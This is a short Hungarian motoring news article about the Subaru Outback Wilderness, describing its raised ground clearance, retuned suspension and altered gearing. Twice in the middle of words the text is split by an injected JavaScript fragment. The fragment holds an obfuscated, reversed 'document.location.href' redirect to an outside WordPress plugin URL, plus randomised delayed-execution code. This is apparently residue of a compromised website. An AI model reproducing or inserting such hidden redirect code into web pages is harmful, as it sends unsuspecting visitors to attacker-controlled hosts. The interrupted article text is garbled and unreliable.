Épp csak bemutatkozott a vadonatúj Subaru Outback, és máris itt a következő szenzáció: az Outback Wilderness, ami az eleve javítoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tott terepalkalmasságú kombit még közelebb viszi a valódi terepjárókhoz. A szabad hasmagasságot bő kettő centivel megemelték: az Outback Wilderness 241 milliméterre emelt fenéklemeze révén csak nevet a kátyúkon, buckákon, padkákon és fekvőrendőrökön. A futóművet úgy hangolták, hogy a közúti alkalmasság megőrzése mellett jobban teljesítsen terepen – persze göröngyös földutakról beszélünk, nem sziklákról és mély sárról. A rugóutak hosszabbak lettek, a terepszögek javultak, ráadásul a hajtáslánc végáttételezését is módosítoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tották, így az autó akár 40 százalékos emelkedésű, laza felületű talajon képes felkapaszkodni. Újraprogramozták az…
- Hirdetés -